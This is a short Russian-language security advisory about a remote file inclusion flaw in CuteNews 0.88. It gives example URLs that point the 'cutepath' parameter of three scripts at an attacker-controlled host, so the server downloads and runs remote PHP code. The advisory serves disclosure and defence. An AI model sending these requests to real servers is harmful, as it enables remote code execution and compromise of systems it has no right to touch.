Выполнение произвольных команд в CuteNews

Дата публикации:
03.03.2003
Дата изменения:
17.10.2006
Всего просмотров:
3815
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
CuteNews 0.x
Описание: Уязвимость включения файла обнаружена в CuteNews. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системе на целевом сервере.

Сообщается, что несколько сценариев включают файлы, не подтверждая правильность местоположения включенного файла. Удаленный пользователь может создать URL, который определяет удаленное местоположение для 'config.php' и 'news.txt' файлов, чтобы заставить сервер выполнить дистанционно расположенный PHP файл. Уязвимы сценарии 'shownews.php', 'search.php', и 'comments.php':

http://[VICTIM]/cutenews/shownews.php?cutepath=http://[ATTACKER]/
http://[VICTIM]/cutenews/search.php?cutepath=http://[ATTAC KER]/
http://[VICTIM]/cutenews/comments.php?cutepath=http://[ATTACKER]/
где
http://[ATTACKER]/config.php или http://[ATTACKER]/news.txt
Любые команды будут выполнены с привилегиями Web сервера.

Уязвимость обнаружена в CuteNews 0.88

Ссылки: PHP code injection in CuteNews

или введите имя

CAPTCHA